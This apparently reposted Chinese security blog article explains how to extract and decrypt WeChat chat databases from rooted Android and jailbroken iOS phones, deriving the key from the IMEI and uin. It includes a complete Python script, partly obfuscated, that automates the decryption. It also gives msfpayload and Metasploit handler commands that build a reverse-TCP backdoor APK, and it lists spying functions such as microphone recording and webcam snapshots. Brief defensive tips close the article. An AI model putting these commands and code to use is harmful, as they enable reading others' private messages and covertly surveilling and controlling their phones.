2. 程式人生 > >獲取安卓iOS上的微信聊天記錄、通過Metasploit控制安卓

獲取安卓iOS上的微信聊天記錄、通過Metasploit控制安卓

阿新 發佈:2019-01-30

在這篇文章中我們將討論如何獲取安卓、蘋果裝置中的微信聊天記錄,並演示如何利用後門通過Metasploit對安卓裝置進行控制。文章比較基礎、可動手性強,有裝置的童鞋不妨邊閱讀文章邊操作,希望能激發大家對移動終端的安全興趣。

“如何獲取Android、iPhone手機上的微信聊天記錄? ”

0×00 條件:

安卓裝置已獲取root許可權,安裝SSHDroid(通過sshftp連線手機)

Apple裝置越獄,安裝OpenSSH外掛

0×01 安卓:

很多安卓手機的使用者都會遇到這麼一個尷尬的問題:手機用久了就不知不覺變得慢了,最後慢到什麼都遲鈍了。為了解決這個問題和大多數人一樣我選擇了root裝置。

安卓裝置在root以後可以對系統檔案存在最高級別的操作許可權。比如,你在安卓裝置上安裝了微信,那麼root以後通過adb shell你能對微信App的檔案配置進行讀取修改等操作。

Android應用程式的資料庫檔案通常會儲存在 /data/data/packagename/database 資料夾下,微信App檔案存放路徑為:/data/data/com.tencent.mm/MicroMsg 

圖片1.png

首先通過FTP把檔案down到本地:

圖片2.png

34位編碼(類似於亂碼)命名的資料夾中可找到微信賬號的加密資料庫檔案 :EnMicroMsg.db

圖片3.png

用資料庫管理器開啟:提示加密或者不是資料庫檔案

圖片4.png

這裡可以用windows環境下的SQLite Database Browser瀏覽器開啟:

圖片5.png

提示輸入密碼:

 圖片6.png

那麼,加密資料庫使用的密碼是什麼呢?我們又該如何獲取到這個密碼?通過上網查資料瞭解到:微信採用手機的IMEI值和微信UIN值的組合來對資料進行加密。

微信賬號uin:即user information 微信使用者資訊識別碼,獲取微信UIN的方式有兩種:

1.通過微信app的“system_config_prefs.xml”配置檔案獲取微信賬號uin;

2.通過抓取WEB版微信聊天的資料包獲取到uin。

1.1 App 配置檔案

find / -name “system_config_prefs.xml”

圖片7.png 

/data/data/com.tencent.mm/shared_prefs/system_config_prefs.xml
cat /data/data/com.tencent.mm/shared_prefs/system_config_prefs.xml | grep uin

Clipboard Image.png

<int name="default_uin" value="146****21" />

1.2 谷歌chrome瀏覽器登陸WEB版微信:

圖片8.png

登陸後新建視窗並訪問chrome://net-internals/#events

傳送資訊 抓包 find uin

圖片9.png

uin:146****21

圖片10.png

通過上述兩種方法找到的uin值是相同的。

安卓撥號介面輸入*#06#獲得手機IMEI碼:354**********85

IMEI值+uin值組合即為354**********85146****21

Clipboard Image.png 

得到32位小寫md5值:1cbf8b842f8bf650aa65e5d3ced07735取其前七位:1cbf8b8輸入到sql瀏覽器中。

Linux、Mac使用者也可以在終端執行:

echo -n "354**********85146****21" | md5sum | cut -c -7

Clipboard Image.png

成功開啟微信的資料庫檔案:

圖片12.png

圖片13.png  

import os
import sys
import re
import hashlib
import csv
import time
import locale
import getopt




def get_db():
    os.popen('adb root').close()
    text = os.popen(
        'adb shell ls /data/data/com.tencent.mm/MicroMsg/*/EnMicroMsg.db').read()
    return text.splitlines()[- 1] if text else ''




def get_default_uin():
    os.popen('adb root').close()
    text = os.popen(
        'adb shell cat /data/data/com.tencent.mm/shared_prefs/system_config_prefs.xml').read()
    default_uin = re.findall(
        'name="default_uin" value="([0-9]+)"', text)
    return default_uin[0] if default_uin else 0




def get_device_ID():
    text = os.popen('adb shell dumpsys iphonesubinfo').read()
    device_ID = re.findall('Device ID = ([0-9]+)', text)
    return device_ID[0] if device_ID else 0




def get_md5():
    default_uin = get_default_uin()
    device_ID = get_device_ID()
    if default_uin and device_ID:
        return hashlib.md5(device_ID + default_uin).hexdigest()[0: 7]
    return ''




def parse_msgcsv(msgcsv):
    locale.setlocale(locale.LC_ALL, '')
    if hasattr(msgcsv, 'title'):
        msgcsv = [ooOoo0O + '\n' for ooOoo0O in msgcsv.splitlines()]
        pass
    OooO0 = csv.reader(msgcsv)
    OooO0.next()
    for ooOoo0O in OooO0:
        try:
            II11iiii1Ii, OO0o, Ooo, O0o0Oo, Oo00OOOOO, O0O, O00o0OO, name, iIi1ii1I1, o0, I11II1i, IIIII = ooOoo0O[
                : 12]
            pass
        except:
            continue
        ooooooO0oo = 'me' if (Oo00OOOOO == '1') else name
        IIiiiiiiIi1I1 = time.localtime(int(O00o0OO) / 1000)
        I1IIIii = time.strftime("%Y-%m-%d %a %H:%M:%S", IIiiiiiiIi1I1)
        yield [name, I1IIIii, ooooooO0oo, iIi1ii1I1, o0]
        pass
    pass




def get_names(chat):
    names = {}
    for name, I1IIIii, ooooooO0oo, iIi1ii1I1, o0 in chat:
        names[name] = 1
        pass
    return names.keys()




def oo(chat, name=''):
    text = []
    name = name.lower()
    for name, I1IIIii, ooooooO0oo, iIi1ii1I1, o0 in chat:
        iIi1ii1I1 = iIi1ii1I1.replace('\n', '\n  ')
        o0 = ('\t' + o0) if o0 else ''
        if not name:
            text.append('%s: %s %s: %s %s' %
                        (name, I1IIIii, ooooooO0oo, iIi1ii1I1, o0))
            pass
        elif name.lower() == name:
            text.append('%s %s: %s %s' %
                        (I1IIIii, ooooooO0oo, iIi1ii1I1, o0))
            pass
        pass
    return '\n'.join(text) + '\n'




def IIIii1II1II(dbn, key=''):
    child_stdin, child_stdout = os.popen2(['sqlcipher', dbn])
    if key:
        child_stdin.write('PRAGMA key=%s;\n' % ` key `)
        child_stdin.write('pragma cipher_use_hmac=off;\n')
        pass
    child_stdin.write('.tables\n')
    child_stdin.close()
    return child_stdout.read().split()




def decrypt(dbn, key='', table='message'):
    table = table or 'message'
    child_stdin, child_stdout = os.popen2(['sqlcipher', dbn])
    child_stdin.write('.header on\n')
    child_stdin.write('.mode csv\n')
    if key:
        child_stdin.write('PRAGMA key=%s;\n' % ` key `)
        child_stdin.write('pragma cipher_use_hmac=off;\n')
        pass
    child_stdin.write('select * from %s;\n' % ` table `)
    child_stdin.close()
    return child_stdout.read()




def wechat2txt(names=[]):
    in_file = 'EnMicroMsg.db'
    out_file = 'message.csv'
    db = get_db()
    md5 = get_md5()
    os.popen('adb wait-for-device')
    os.popen('adb pull %s %s' % (db, in_file)).close()
    msgcsv = decrypt(in_file, md5)
    if msgcsv.find('\n') < 0:
        return 1
    file(out_file, 'w').write(msgcsv)
    msgs = list(parse_msgcsv(msgcsv))
    if not msgs:
        return 1
    if not names:
        names = get_names(msgs)
        pass
    for name in names:
        filename = 'message.%s.txt' % name
        text = oo(msgs, name)
        if len(text) > 4:
            file(filename, 'w').write(text)
            pass
        pass
    pass


help_msg = '''Usage: wechat2txt.py [OPTIONS] [NAME]...

OPTIONS:
    -h        display this help and exit
'''




def main():
    try:
        opts, args = getopt.getopt(sys.argv[1:], 'h')
    except getopt.error, e:
        print help_msg
        return 1
    for opt, arg in opts:
        if opt == '-h':
            print help_msg
            return 1
        pass
    names = args
    text = wechat2txt(names)
    return not text


if __name__ == "__main__":
    sys.exit(main())

0×02 蘋果:

Apple裝置越獄後可通過Cydia安裝各種小外掛,通常情況我會安裝OpenSSH來使自己能通過終端連線到Apple裝置中,並使用sftp傳輸檔案:

IMG_0716.JPG

iOS中,應用資料夾以hash值命名,要匯出微信、QQ的聊天記錄其難度相對安卓來說稍微複雜很多。

在實際操作中我們可以通過巧用Linux命令(find、grep、xargs)來繞過這些坑。 

find /var/mobile/Containers/Data -name "MM.sqlite" 

mkdir /cache
find /var/mobile/Containers/Data -name "MM.sqlite" |xargs -I {} dirname {} | xargs -I {} cp -r  {}/../../ /cache

0×03 在安卓終端植入後門

3.1 實驗環境

Kali Linux(Hack):192.168.31.213

Android(靶機):192.168.31.118

3.2生成後門檔案: 

cd Desktop
msfpayload android/meterpreter/reverse_tcp LHOST=192.168.31.213 LPORT=443 R >0xroot.apk

Clipboard Image.png

3.3 執行metasploit控制檯 

msfconsole

use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST 192.168.31.213
set LPORT 443
run

Clipboard Image.png

3.4 安裝&執行後門App

Screenshot_2016-06-27-14-04-48.pngScreenshot_2016-06-28-15-50-59.png

後門能進行什麼操作?我們來看看usage: 

meterpreter > help

Core Commands
=============

    Command                   Description
    -------                   -----------
    ?                         Help menu
    background                Backgrounds the current session
    bgkill                    Kills a background meterpreter script
    bglist                    Lists running background scripts
    bgrun                     Executes a meterpreter script as a background thread
    channel                   Displays information about active channels
    close                     Closes a channel
    disable_unicode_encoding  Disables encoding of unicode strings
    enable_unicode_encoding   Enables encoding of unicode strings
    exit                      Terminate the meterpreter session
    help                      Help menu
    info                      Displays information about a Post module
    interact                  Interacts with a channel
    irb                       Drop into irb scripting mode
    load                      Load one or more meterpreter extensions
    quit                      Terminate the meterpreter session
    read                      Reads data from a channel
    resource                  Run the commands stored in a file
    run                       Executes a meterpreter script or Post module
    use                       Deprecated alias for 'load'
    write                     Writes data to a channel


Stdapi: File system Commands
============================

    Command       Description
    -------       -----------
    cat           Read the contents of a file to the screen
    cd            Change directory
    download      Download a file or directory
    edit          Edit a file
    getlwd        Print local working directory
    getwd         Print working directory
    lcd           Change local working directory
    lpwd          Print local working directory
    ls            List files
    mkdir         Make directory
    pwd           Print working directory
    rm            Delete the specified file
    rmdir         Remove directory
    search        Search for files
    upload        Upload a file or directory


Stdapi: Networking Commands
===========================

    Command       Description
    -------       -----------
    ifconfig      Display interfaces
    ipconfig      Display interfaces
    portfwd       Forward a local port to a remote service
    route         View and modify the routing table


Stdapi: System Commands
=======================

    Command       Description
    -------       -----------
    execute       Execute a command
    getuid        Get the user that the server is running as
    ps            List running processes
    shell         Drop into a system command shell
    sysinfo       Gets information about the remote system, such as OS


Stdapi: Webcam Commands
=======================

    Command       Description
    -------       -----------
    record_mic    Record audio from the default microphone for X seconds
    webcam_list   List webcams
    webcam_snap   Take a snapshot from the specified webcam

record_mic 通過手機麥克風進行竊聽、錄音;

webcam_list 列出安卓裝置的所有攝像頭;

webcam_snap 通過攝像頭進行偷拍…

等等

0×04 演示視訊

0×05 APK後門分析:

把apk放到apk分析工具(apkStudio、Bytecodeviewer)進行解包,我們來看看後門App的原始碼:

Clipboard Image.png

(apkStudio)

在smali/com/metasploit/stage/MainActivity.smali中我們可以找到後門伺服器的ip埠配置:

1111.png

(apkStudio)

Clipboard Image.png

(Bytecodeviewer)

0×06 預防&安全建議

安卓:從可信來源下載應用程式,避免感染惡意程式;在移動充電樁充電前及時關閉USB除錯。

蘋果:越獄後及時修改root密碼,避免使用預設密碼、弱口令。

0×07 文中工具下載地址:

轉載來自FreeBuf黑客與極客

相關推薦

獲取iOS聊天記錄通過Metasploit控制

在這篇文章中我們將討論如何獲取安卓、蘋果裝置中的微信聊天記錄,並演示如何利用後門通過Metasploit對安卓裝置進行控制。文章比較基礎、可動手性強,有裝置的童鞋不妨邊閱讀文章邊操作,希望能激發大家對移動終端的安全興趣。 “如何獲取Android、iPhone手機上的

刪除的聊天記錄怎麽恢復?如何恢復刪除的聊天記錄語音聊天記錄

暫停 語音 查找 一個 目錄 找到 開頭 掃描 處理 昨天和一個朋友用微信語音聊天,由於操作失誤,把聊天記錄給刪除了。想恢復,去網上找了好多的文章看,沒一個靠譜的。還有好多標題黨,標題寫的微信聊天記錄,可是內容是QQ聊天記錄。我搜索了一下,關心這個問題的朋友還很多,現在我就

移動端html5圖片傳方法【更好的相容IOS

<!doctype html>  <html>  <head>  <meta charset="utf-8">  <meta name="viewport" content="width=device-width, initial-scale=1, ma

聊天記錄刪除了怎麽恢復

大家現在面對微信的使用已經是越來越熟練了,不過唯一的問題就是在面對數據丟失的時候,該怎們去進行找回和恢復,想要輕松的找回那就先看看介紹吧,安卓微信聊天記錄刪除了怎麽恢復?其實只是需要一款軟件的幫助就可以了,大家先看下面的介紹吧! 互盾安卓恢復大師是一款專門針對安卓手機研發的數據恢復軟件,可用

華為新機榮耀Magic2,聊天記錄怎麼恢復?【篇】

華為新機Magic2,微信聊天記錄怎麼恢復?微信聊天記錄只需要點清空全部聊天記錄就會被全部刪除,甚至是左滑刪除,也會將聯絡人的聊天記錄給誤刪了,當我們刪除後,頓時想要去恢復已刪除的聊天記錄。怎麼辦呢?怎麼樣才能去恢復無需電腦恢復誤刪除的聊天記錄?要恢復刪除的微信

手機ROOT提取聊天記錄到利用Python進行詞雲分析全過程

剛剛來到了2018年,正值女票生日將近。想想這一年來我倆的聊天記錄也不少(匯出後一看十個月的微信文字聊天記錄將近8萬條 ^-^),於是就有了將我們的聊天記錄匯出來製作成詞雲,或者分析一下她說的最多的一句話是什麼?還打算做個預測模型,輸入一個句子然後讓模型預測下是她說的還是我說的,哈哈,想想還有點小激

如何從手機恢復誤刪的聊天記錄

微信使用者最擔心的事情莫過於聊天記錄誤刪,或者通訊錄被清空。誤刪聊天記錄其實還好,如果通訊錄被徹底清空,那麼只能重新加好友。隨著人們生活、工作節奏加快,微信成為人們之間聯絡的紐帶之一,不得不錯,其它任何的事情都可以出Bug,唯獨微信則不行。那麼我們如何從手機上恢復誤刪的微信聊天記錄呢?下面小編分享給大家一個小

Android 獲取手機中聊天記錄

首先我們要知道,微信的聊天記錄一般是不提供給我們獲取的,所以一般情況下我們手機沒root的話就拿不到了。就算是root後的手機,想要獲取微信的EnMicroMsg.db檔案並且解密它、開啟它也有點難度。 下面我們就來演示怎麼從安卓裝置的手機中拿到微信的資料檔案

HTML5+weui仿聊天功能長按刪除功能

html5微信聊天 h5微信聊天界面最近由於項目需要, 就運用html5+css3+weui+jquery實現的微信聊天小案例,可發表圖像、紅包、打賞...功能, 還可以長按刪除消息。。。案例截圖如下:HTML及Js片段:<!DOCTYPE html><html lang="zh-cn"&g

聊天記錄要怎麽恢復刪除的記錄?這一小妙招你不知道嗎

說到男人出軌,女人就有話要說了。相信絕大數女人聽到自己男人在外面有小三,一定是非常的暴跳如雷,電話不停的轟擊男人的手機,直到男人接聽為止。這事第一件事,獲得男人目前所在的具體位置。 那麽第二件事就是等男人回到家後拷問男人以及關於小三的事

再也不用砸鍵盤,教你輕輕松松找回聊天記錄

再也不用砸鍵盤,教你輕輕松松找回微信聊天記錄 手機承載的功能越來越多了,相對之出現的失誤也會越來越多。最近身邊有很多人在抱怨因為自己誤刪微信的聊天記錄,導致一些重要的信息丟失。往往大家在清理空間時都會出現把聊天記錄刪除的情況,如果我們誤刪了微信裏的聊天記錄,應該怎麽辦?

蘋果手機聊天記錄刪除了怎麽恢復?全部恢復教程

現在微信版本不斷提高,為的就是將微信中更好的功能呈現給用戶使用,不過平常我們都只是利用微信進行聊天或搶紅包以及發紅包等功能。那麽我們要怎麽才能將手機中的一些微信聊天記錄進行恢復到手機中呢? 其實微信很早的版本就是微信聊天記錄遷移功能,就

三分鐘恢復蘋果手機聊天記錄

數據恢復 三分鐘恢復蘋果手機微信聊天記錄 現在一切都開始趨向科技化,生活方式,與人之間的溝通交流。而微信是目前用戶量最多的一個社交軟件,很多人都習慣使用微信來傳遞信息,乃至與朋友之間的溝通交流,都交給了微信,這樣一來的話微信的聊天記錄中就有著許多重要的的信息,如果不小心的話可能會

要怎麽才能不用密碼就可以查看聊天記錄

作為男人你心累嗎,老婆經常將微信加密,不讓你查看裏面的微信內容,沒有加密的時候,聊天記錄頁面又是一篇空白的,沒啥內容。好不容易將老婆手機拿在手上,當然不能放過能夠查看聊天記錄的機會。不知道怎麽查看清空後的聊天記錄,,看完下文你了解多少。 1、在手機聊天記錄被清空的時候,一般手

蘋果手機怎麽恢復聊天記錄?快速恢復方法

蘋果手機怎麽恢復微信聊天記錄?眾所周知,蘋果一直都占據著全球智能手機的王者寶座。所以幾乎在大街上任何的角落都可以發現蘋果的相關產品,很多公司都針對蘋果系統不斷開發屬於自己的App,微信也不例外。但是蘋果系統雖然優秀,但由於不開源的初衷,導致有些小夥伴想查詢刪除的微信聊天記錄時就變得非常不方便。那麽蘋果手

已經刪除的聊天記錄還能這樣被找回!

微信聊天記錄刪除恢復 微信聊天記錄恢復 活到這把年紀,誰還沒有發過一兩句內涵豐富的微信聊天記錄呢?你是不是以為刪掉就萬事大吉了?小編要大聲地告訴你,已刪除的iPhone的微信聊天記錄其實還是可以被查看的。一、已經刪除的微信聊天記錄能不能回復剛剛刪除的微信聊天記錄其實依然保留在iPhone手機中,我們只

PC版聊天記錄重裝系統後如何保留!

聊天 例如 登錄 file ech window 刪除 chat hat 保留的意思是重裝系統後,登上微信,以前的聊天記錄都在。前提:重裝前微信的聊天記錄所在目錄最好在除系統分區以外的分區,例如D盤;操作:1、只重裝系統分區,例如C盤,聊天記錄所在分區既不要刪除也不要格式化

怎麽查看已經跟別人聊很久的聊天記錄

enc 不同的 字母 card 記錄 信息 原來 數據大小 不用 微信是騰訊旗下的一款社交軟件,和QQ有點類似,微信的記錄大都數都是暫時的保存在手機內存卡裏面的,會自動根據保存的數據大小不定時的情況一些記錄,如果微信聊天記錄被刪除了應該怎麽回復?正常情況下是不可能恢復的,如

聊天記錄中的檔案傳送到郵箱

有時我們會把電腦上的檔案傳送給微信群,而傳送到群裡的檔案有時需要用手機發送到郵箱裡,如何實現呢? 我們知道,通過網路傳送電子郵件是需要電子郵箱的,用微信傳送電子郵件也是要利用電子郵箱,所以首先,我們要確保自己擁有一個可以使用的電子郵箱。 其次,利用微信傳送電子郵件,我們需要指明收

怎樣恢復手機聊天記錄

微信聊天記錄怎麼恢復?生活中我們會因為微信資料庫崩潰導致微信聊天記錄丟失,也有可能會因為自己手動刪除了對話方塊而導致微信聊天記錄丟失,無論是哪一種方式導致的微信聊天記錄丟失,我們都有解決方案。話不多說,我們一起看看微信聊天記錄的恢復方法吧。開始恢復:步驟一:我們可以在手機應用商城或是手機瀏覽器查詢“極速資料恢